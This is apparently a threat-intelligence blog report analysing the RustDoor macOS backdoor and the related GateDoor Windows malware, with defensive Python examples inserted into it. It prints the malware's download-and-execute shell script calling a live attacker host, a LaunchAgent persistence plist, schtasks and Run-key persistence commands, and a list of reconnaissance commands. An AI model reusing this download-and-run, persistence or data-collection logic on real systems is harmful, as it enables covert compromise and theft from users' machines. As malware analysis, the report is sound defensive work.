Author: Minyeop Choi, Sojun Ryu, Sebin Lee, HuiSeong Yang | BLKSMTH

Last Modified : Feb 19, 2024


Executive Summary

Introduction

Recently, a lot of malware targeting macOS users has been discovered. ZuRu malware variant and macOS.Bkdr.Activator, which were distributed in pirated macOS applications are such cases.

Against this background, attackers' use of Golang and Rust, which support multiple platforms, is increasing, and the possibility of writing code more efficiently by using AI tools such as ChatGPT and Copilot when developing malware has undoubtedly increased. It is also worth noting that attackers are putting a lot of effort into attacking the macOS environment, as the number of MacBook users has increased since the introduction of Apple silicon. Accordingly, malware targeting macOS performs malicious acts such as stealing information stored on the device or secretly using its resources.

In December 2023, Talon, the threat research center in S2W, discovered that macOS malware named RustDoor (following the name given by BitDefender) was being distributed disguised as a Visual Studio update. At the time of discovery, not a single engine on VirusTotal detected it as malicious, which shows that malicious macOS binaries written in Rust are harder for current security products to detect than their Windows counterparts. This report covers a detailed analysis of the identified RustDoor malware and introduces the Windows-targeting malware identified as the predecessor of RustDoor.

Attack Overview

We have identified the following key characteristics after tracking RustDoor malware over the past 3 months. S2W internally named the malware family GateDoor, but to distinguish it from BitDefender’s RustDoor, the macOS version will be called RustDoor, and the Windows malware version will be called GateDoor.

1. Cross Platform

The initial version of RustDoor is believed to have been produced based on Golang for the Windows environment and was developed at least before the end of September 2023. Afterward, the attacker targeted macOS and developed malware based on Rust, and it is believed that preparations for the attack were completed at least in December 2023. It is expected that the attacker developed the malware in Golang and Rust, with various environments in mind from the early stages of malware development. Additionally, it is expected that during this process, it was produced in Golang and then changed to Rust, which is more difficult to analyze. The macOS version of RustDoor targets Silicon MacBooks. Among the hunted RustDoor files, many file names start with localfile~ because each ARM and Intel binary in one RustDoor binary was separated and submitted to VirusTotal.
(Silicon binaries include binaries for both ARM and Intel versions.)

Figure 1. RustDoor malware reported in VirusTotal
Table 1. Filenames of RustDoor and GateDoor

2. Disguising as a legitimate file

RustDoor is disguised as a normal update program, as it is distributed under file names such as VisualStudioUpdater and ChromeUpdates.
In addition to file names, some specific words were used in distribution sites and C&C servers. In particular, keywords such as “Mac,” “iCloud,” and “Apple” related to Apple were used as the address of the C&C server.

It was confirmed that the GateDoor was distributed disguised as a normal WebViewHost utility. At the time, since it was distributed to Windows, general keywords were used in the domain address.

Table 2. The infrastructure of RustDoor and GateDoor

3. Initial stages

GateDoor and RustDoor seem to be distributed by encouraging people to download utilities or fake normal update programs through distribution sites disguised as normal. However, it has also been found that RustDoor was distributed under the guise of a job search theme.

GateDoor

GateDoor was distributed disguised as a utility called WebViewHost. The attacker distributed the legitimate WebViewHost utility in the form of a ZIP file or MSI file, and by applying the DLL Search Order Hijacking technique when the user runs the WebViewHost.exe file, the malicious WebView2Loader.dll file is loaded. After that, the DLL file downloads and executes the GateDoor malware from an external server. As confirmed, the edging.zip file was used in late September, and the BinMS.msi file was used in early November 2023. In the case of MSI files, files are created in the path below when executed.

The GateDoor Downloader contains the following config values, and these values are encrypted with a specific XOR key value (“nfmMoPCj”).
— GateDoor download base URL
— GateDoor download URL path
— File name saved locally after downloading
— HKEY_CURRENT_USERActivateS sub registry key value (MicrosoftEdging)
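To show how an analyst recovers such fields, the following is an added example (not code from the report or from the malware): a repeating-key XOR decoder using the key value the report gives, "nfmMoPCj". The report only states that the config values are XOR-encrypted with this key; that the key repeats over raw bytes and that the plaintexts are UTF-8 strings are assumptions, and the sample values encoded below are constructed placeholders rather than the real infrastructure.

```python
"""Repeating-key XOR decoder for the GateDoor downloader's config fields (added example)."""
from itertools import cycle

XOR_KEY = b"nfmMoPCj"  # key value reported in the analysis


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR every byte of `data` with the key, repeating the key as needed.

    XOR is its own inverse, so the same routine both encodes and decodes.
    Assumption: the key is applied byte-wise and cyclically over the raw blob.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_config(blobs: dict[str, bytes]) -> dict[str, str]:
    """Decode each encrypted field to text.

    A UnicodeDecodeError here is a useful signal that either the key or the
    layout assumption is wrong for the sample being analysed.
    """
    return {name: xor_bytes(blob).decode("utf-8") for name, blob in blobs.items()}


# Constructed sample modelled on the four fields the report lists. The URL and
# file name are placeholders, not the real infrastructure; they are encrypted
# here with the same XOR so the example runs offline.
SAMPLE_PLAINTEXT = {
    "download_base_url": "https://c2-placeholder.invalid",
    "download_url_path": "/files/payload_placeholder",
    "local_file_name": "payload_placeholder.exe",
    "registry_subkey": "MicrosoftEdging",
}
SAMPLE_ENCRYPTED = {k: xor_bytes(v.encode("utf-8")) for k, v in SAMPLE_PLAINTEXT.items()}


if __name__ == "__main__":
    for field, value in decode_config(SAMPLE_ENCRYPTED).items():
        print(f"{field}: {value}")
```

In practice the encrypted blobs would be carved from the DLL (for example from the .rdata section) and passed to decode_config; the decoder itself does not change.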

Figure 2. The infection process of GateDoor

In addition, the distribution method via MSI files discovered in early November 2023 included the MSI file, GateDoor Downloader, and GateDoor malware signed with a valid certificate.

RustDoor — Job search theme

In one case, it was found that RustDoor malware was distributed disguised as a job-related file. A shell script file that downloads RustDoor and normal document files was distributed with the file name Jobinfo.app.zip, and when the script file is executed, RustDoor malware is executed with the file name Previewers.

Figure 3. The infection process of the Job search theme RustDoor

Table 3. Content of the shell script

#!/bin/sh
cd /tmp
curl -O -s https://turkishfurniture.blog/job.pdf
open job.pdf
cd "/Users/$(whoami)/"
curl -O -s https://turkishfurniture.blog/Previewers
chmod +x Previewers
./Previewers

4. Infrastructure

Among the attacker infrastructure, trendfilesalgol[.]com, confirmed to be the C&C server for the earliest GateDoor malware, was first assigned a Russian IP and finally a Romanian IP address of 192.29.13[.]152.

Table 4. IP allocation history for trendfilesalgol.com domain

desktop365metrics[.]com, used as a distribution site for GateDoor, has been used since August 23, 2023, and is hosted on Digital Ocean.

Table 5. IP allocation history for desktop365metrics.com domain

Later, 193.29.13[.]167, the earliest C&C among RustDoor’s C&C servers, was confirmed to be a Romanian IP. The maconlineoffice[.]com domain, one of the C&C domains, is also connected to the corresponding IP. From then on, hosting servers in Germany, the United States, Brazil, and Singapore were used.

Table 6. Information on RustDoor Infrastructure

The attacker initially built infrastructure through hosting companies in Eastern Europe, such as Russia and Romania. In particular, the Romanian IP (193.29.13.152) was used as a C&C server and domain registration site. When distributing malware, they avoided using IPs, created domains, and used various hosting servers worldwide. In this respect, there is a possibility that the attacker is geopolitically located in Eastern Europe.

Detailed Analysis

This chapter provides a detailed analysis of the RustDoor malware. This file is malware written in Rust, targets macOS, and can attack both Intel and Apple Silicon chipsets.

1. RustDoor v1

In the case of the early version of RustDoor, no separate configuration information exists internally. The early version of RustDoor registers malware in the macOS startup program by creating a new plist in the /Library/LaunchAgents path to maintain persistence.

Table 7. Content of the plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.visualstudio</string>
<key>Program</key>
<string>{Path to RustDoor}</string>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
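As an added defensive example (not code from the report), the script below parses a LaunchAgent plist with the standard plistlib module and flags the traits visible in Table 7: an Apple-style label (com.apple.*) pointing at a binary outside the locations where genuine Apple agents live, RunAtLoad, a KeepAlive block that relaunches the program after a non-zero exit, and a program path in a user-writable directory. The sample plist is constructed from Table 7 with a placeholder program path; the list of trusted Apple prefixes and user-writable prefixes is an assumption for illustration.

```python
"""Audit LaunchAgent plists for the persistence pattern in Table 7 (added example)."""
import plistlib
from pathlib import Path

# Constructed sample modelled on Table 7; the Program path is a placeholder.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.visualstudio</string>
<key>Program</key><string>/Users/victim/Library/VisualStudioUpdater</string>
<key>KeepAlive</key><dict><key>SuccessfulExit</key><false/></dict>
<key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed benign agent for comparison: vendor label, program under /Applications.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/Applications/Example.app/Contents/MacOS/updater</string></array>
</dict>
</plist>
"""

# Assumption: where genuine Apple-labelled agents are installed.
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")
# Assumption: locations an unprivileged user can write to.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")


def audit_launch_agent(data: bytes) -> list[str]:
    """Return a list of human-readable findings for one plist (empty if nothing suspicious)."""
    findings = []
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    # launchd accepts either Program or ProgramArguments; the executable is argv[0].
    program = plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]

    if label.startswith("com.apple.") and not program.startswith(APPLE_PROGRAM_PREFIXES):
        findings.append(f"Apple-style label {label!r} runs non-Apple binary {program!r}")
    if plist.get("RunAtLoad") is True:
        findings.append("RunAtLoad is set: program starts at login")
    keep_alive = plist.get("KeepAlive")
    # SuccessfulExit=false means launchd restarts the job whenever it exits non-zero.
    if keep_alive is True or (isinstance(keep_alive, dict) and keep_alive.get("SuccessfulExit") is False):
        findings.append("KeepAlive relaunches the program after a non-zero exit")
    if program.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program lives in a user-writable location: {program!r}")
    return findings


def audit_directory(directory: Path = Path("/Library/LaunchAgents")) -> dict[str, list[str]]:
    """Audit every *.plist in a directory; unparsable files are reported rather than skipped."""
    results = {}
    for path in sorted(directory.glob("*.plist")):
        try:
            findings = audit_launch_agent(path.read_bytes())
        except Exception as exc:  # malformed plist, permission error, etc.
            findings = [f"could not parse: {exc}"]
        if findings:
            results[str(path)] = findings
    return results


if __name__ == "__main__":
    for finding in audit_launch_agent(SAMPLE_PLIST):
        print("-", finding)
    for path, findings in audit_directory().items():
        print(path, findings)
```

Running audit_directory against /Library/LaunchAgents and ~/Library/LaunchAgents gives a quick triage list; the Apple-label check is the one most specific to this sample, since the legitimate com.apple.* agents ship under /System.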

2. RustDoor v2

RustDoor v2, later updated, stores configuration information in JSON format within the malware to support various persistence methods depending on the situation. RustDoor reads the value immediately after execution and determines how to maintain persistence for each field.

Table 8. Configuration in RustDoor

{
  "daemonize": true,
  "check_cron_asked": true,
  "lock_in_cron": true,
  "lock_in_dock": true,
  "lock_in_launch": false,
  "copy_files": true,
  "apps": [
    {
      "id": 1,
      "name": "Firefox",
      "path": "/Applications/Firefox.app/",
      "icon": "/Applications/Firefox.app/Contents/Resources/firefox.icns",
      "exec": "firefox",
      "show_dialog": false,
      "dialog_title": "title"
    },
    …

The setting values that confirm the function in the above settings are as follows.

Table 9. Role of each field in the configuration

3. Common malicious behavior

3.1 Register

RustDoor transmits information about the infected device to the C&C server through an HTTP POST request and receives the client’s unique ID from the server. The URL used here is [Base C2 URL]/gateway/register and the data below is delivered in JSON format.

Table 10. The information delivered for the register

Only a number is received as a response value without any other format; that number is the client ID given to the infected device.

3.2 Malicious Action

RustDoor periodically requests commands from the C&C server every second. Command requests are made to [Base C2 URL]/gateway/report and the assigned client ID is delivered in JSON format.

Table 11. Command request

The C&C server delivers the following data to RustDoor, which includes a command to be executed. RustDoor performs tasks corresponding to the name and is managed by assigning it to the ID.

Table 12. Command response

The list of commands and additional data required are as follows.

Table 13. List of commands

In the case of the “upload” command, only files from a specific path on the C&C server can be downloaded. This is done by downloading the file as a ZIP file and decompressing it to the work path.

In the case of the “download” command, the specified file is compressed into a temp.zip file and sent to the [Base C2 URL]/tasks/upload_file path.

When the task is completed, or the command result needs to be transmitted, RustDoor delivers the following data to [Base C2 URL]/gateway/task.

Table 14. Delivery of command results
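The register/report/task cycle described in 3.1 and 3.2 (and the GateDoor-only gateway/future_task endpoint from section 4.1) is easy to spot in proxy logs, because the same client polls /gateway/report about once a second. The following is an added detection example, not code from the report: it parses constructed proxy log lines, groups requests by client and host, and raises an alert when it sees either a sustained one-second beacon to /gateway/report or a full register-then-report-then-task sequence. The log format, the host names and the thresholds are assumptions; only the endpoint paths and the one-second interval come from the report.

```python
"""Flag RustDoor/GateDoor-style C2 traffic in web proxy logs (added example)."""
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Endpoint paths from the analysis; /gateway/future_task is GateDoor-only.
REGISTER = "/gateway/register"
REPORT = "/gateway/report"
RESULT_PATHS = {"/gateway/task", "/tasks/upload_file", "/gateway/future_task"}
C2_PATHS = {REGISTER, REPORT} | RESULT_PATHS

# Constructed proxy log: "<ISO timestamp> <client> <method> <url>" (assumed format).
SAMPLE_LOG = """\
2024-01-10T09:00:00 10.0.0.5 POST http://c2-placeholder.invalid/gateway/register
2024-01-10T09:00:01 10.0.0.5 POST http://c2-placeholder.invalid/gateway/report
2024-01-10T09:00:02 10.0.0.5 POST http://c2-placeholder.invalid/gateway/report
2024-01-10T09:00:03 10.0.0.5 POST http://c2-placeholder.invalid/gateway/report
2024-01-10T09:00:04 10.0.0.5 POST http://c2-placeholder.invalid/gateway/report
2024-01-10T09:00:05 10.0.0.5 POST http://c2-placeholder.invalid/gateway/report
2024-01-10T09:00:06 10.0.0.5 POST http://c2-placeholder.invalid/gateway/task
2024-01-10T09:00:07 10.0.0.9 GET http://www.example.invalid/gateway/report
2024-01-10T09:00:08 10.0.0.9 GET http://www.example.invalid/index.html
"""


def parse_line(line: str) -> dict:
    """Split one log line into its fields; raises ValueError on a malformed line."""
    ts, client, method, url = line.split()
    parts = urlsplit(url)
    return {"ts": datetime.fromisoformat(ts), "client": client,
            "method": method, "host": parts.netloc, "path": parts.path}


def detect_c2(log_text: str, max_median_gap_s: float = 2.0, min_reports: int = 5) -> list[dict]:
    """Return one alert per (client, host) pair whose requests look like the C2 cycle."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["path"] in C2_PATHS:
            sessions[(rec["client"], rec["host"])].append(rec)

    alerts = []
    for (client, host), recs in sessions.items():
        recs.sort(key=lambda r: r["ts"])
        paths = {r["path"] for r in recs}
        report_ts = [r["ts"] for r in recs if r["path"] == REPORT]
        gaps = [(b - a).total_seconds() for a, b in zip(report_ts, report_ts[1:])]
        median_gap = sorted(gaps)[len(gaps) // 2] if gaps else None

        # Signal 1: many /gateway/report polls at a tight, regular interval.
        beaconing = len(report_ts) >= min_reports and median_gap is not None and median_gap <= max_median_gap_s
        # Signal 2: the full lifecycle, register -> report -> task result, regardless of rate.
        full_cycle = REGISTER in paths and REPORT in paths and bool(paths & RESULT_PATHS)

        if beaconing or full_cycle:
            alerts.append({
                "client": client, "host": host,
                "family_hint": "GateDoor" if "/gateway/future_task" in paths else "RustDoor/GateDoor",
                "reports": len(report_ts), "median_gap_s": median_gap,
                "endpoints": sorted(paths),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_c2(SAMPLE_LOG):
        print(alert)
```

A single hit on /gateway/report (the 10.0.0.9 client above) produces no alert on its own; the logic needs either the steady poll or the register/task sequence, which keeps false positives from unrelated web apps that happen to use a similar path down.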

4. GateDoor

GateDoor, designed to target the Windows operating system with endpoints and protocols similar to RustDoor, was additionally identified. The malware is written in Golang and is focused on executing arbitrary code or executable files in various ways.

4.1 Commonalities with RustDoor

GateDoor supports 3 of the 4 endpoints used by RustDoor, and future_task, a separate endpoint used only by GateDoor, has been additionally confirmed.

Table 15. The endpoint difference between RustDoor and GateDoor

Additionally, both GateDoor and RustDoor’s C&C servers are built with the Django REST Framework, so they return the same error message.

Figure 4. Error message when connecting to GateDoor C&C server (Left) / Figure 5. Error message when connecting to RustDoor C&C server (Right)

4.2 Differences from RustDoor

Because GateDoor targets the Windows operating system, the information when registering a device infected with malware differs from RustDoor.

Table 16. Information sent when registering in GateDoor

In the case of GateDoor, the client ID and a list of commands to be immediately executed are transmitted. The result of the command received with future is sent to the gateway/future_task endpoint.

Table 17. Response to registration

Afterward, the malware executes features to maintain persistence. GateDoor implements various methods to maintain persistence, but internal fixed values determine the method.

Note that the installation path of the legitimate EXE file that loads the GateDoor downloader is C:\Users\[username]\AppData\Roaming\MicrosoftEdging\WebViewHost.exe.

  1. Register the EXE path into C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
  2. Register into the Run registry key to run GateDoor at boot-up
    — Path: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    — Key: MicrosoftOffice.Hub
    — Value: [The EXE path]
  3. Utilize schtasks.exe
    — schtasks.exe /Create /SC ONLOGON /F /TN MicrosoftEdging /TR [The EXE path]
    — schtask.exe /Create /SC onidle /F /TN MicrosoftEdging /TR [The EXE path] /i 30

The command request through the gateway/report endpoint is the same, but the response value has an added field called exe_param, which is an argument required for file execution in addition to the argument for the command.

Table 18. Response to the command request

Unlike RustDoor, the commands supported by GateDoor support various features for executing arbitrary commands or additional files. RustDoor can be viewed as malware specialized in backdoor functions, while GateDoor is malware specialized in backdoor and loader functions.

Table 19. List of commands

5. DataCollector

Additional malware communicating with the sarkerrentacars[.]com domain was identified. It is likewise written in Golang and uses the internal name DataCollector. DataCollector runs commands to collect information from infected Intel-based macOS devices and sends the output to the attacker's server using the GET method. The commands that DataCollector executes to collect data are as follows. As a result, the stolen information includes system information, network information, software information, hardware information, the registered daemon list, the kernel parameter list, and disk information.

Table 20. List of commands that DataCollector executes

system_profiler SPSoftwareDataType SPHardwareDataType
networksetup -listallnetworkservices
networksetup -listallhardwareports
launchctl list
sysctl -a
diskutil list

Attribution

In September 2023, Group-IB unveiled a new RaaS (Ransomware-as-a-Service) Affiliate called ShadowSyndicate. They identified 85 servers using the same SSH Fingerprint key from July 16, 2022, to September 2023, and these servers were used as C&C servers for malware such as Cobalt Strike, IcedID, and Sliver. Since these servers have been identified to be related to 7 ransomware groups, it is presumed that the group is an affiliate collaborating with several RaaS groups.

While tracking the infrastructure of the RustDoor malware, we found a correlation between the IP of the C&C server (193.29.13[.]167, 88.214.26[.]22) and ShadowSyndicate. As a result of pivoting the SSH Fingerprint key released by Group-IB, the 193.29.13[.]167 IP was discovered. Since the Issuer & JARM of the SSL certificate used by 193.29.13[.]167 and 88.214.26[.]22 are the same, the infrastructure is also suspected of being related to ShadowSyndicate. This information was already made known on X by Chris Duggan.

Figure 6. Association with ShadowSyndicate (Source: X)

We additionally traced the infrastructure of the GateDoor malware we identified. In this process, we discovered that many servers used the same SSH fingerprint value as the IP (193.29.13[.]152) assigned to the C&C server domain (trendfilesalgol[.]com). Investigating these servers showed that they were used as C&C servers for various malware such as Cobalt Strike, StealC, and TrueBot, and the watermark of the Cobalt Strike Beacon was the same as that mentioned by Group-IB. Among these, the watermark used by Clop (1580103824) and the watermark used by ALPHV and Nokoyawa (674054486) were identified.

Figure 7. Correlation with SSH FingerPrint of GateDoor malware C&C server

It was also confirmed that many IPs (81.19.135[.]215, etc.) were mentioned among the additionally confirmed servers in the Medium content released by Joshuapenny.

Figure 8. Part of the IPs mentioned by Joshuapenny
(Source: Infrastructure Analysis: LockBit 3.0 Ransomware Affiliates Exploit CVE-2023-4966 Citrix Bleed Vulnerability)

Given that the above infrastructures are heavily linked to cybercriminals such as RaaS, we estimate that cybercriminals, not the APT group, are behind this malware. As previously disclosed by Chris Duggan, there is a connection with the ShadowSyndicate threat actor. This is supported by the fact that the method of distributing malware and the features of the malware are not yet sophisticated and that it is different from existing APT groups. However, given that the infrastructure identified as ShadowSyndicate is very extensive and many cyber-criminals are connected, we should consider the possibility of a cybercrime collaborator specializing in providing infrastructure.

Conclusion

Appendix A. IoCs

GateDoor

RustDoor

DataCollector

Network

Appendix B. MITRE ATT&CK

Execution

Persistence

Discovery

Command and Control

Exfiltration


Source: https://medium.com/s2wblog/rustdoor-and-gatedoor-a-new-pair-of-weapons-disguised-as-legitimate-software-by-suspected-34c94e558b40

Tags: CVE, VULNERABILITY, EXFILTRATION, APT, APPLE, PAYLOAD, WINDOWS, BACKDOOR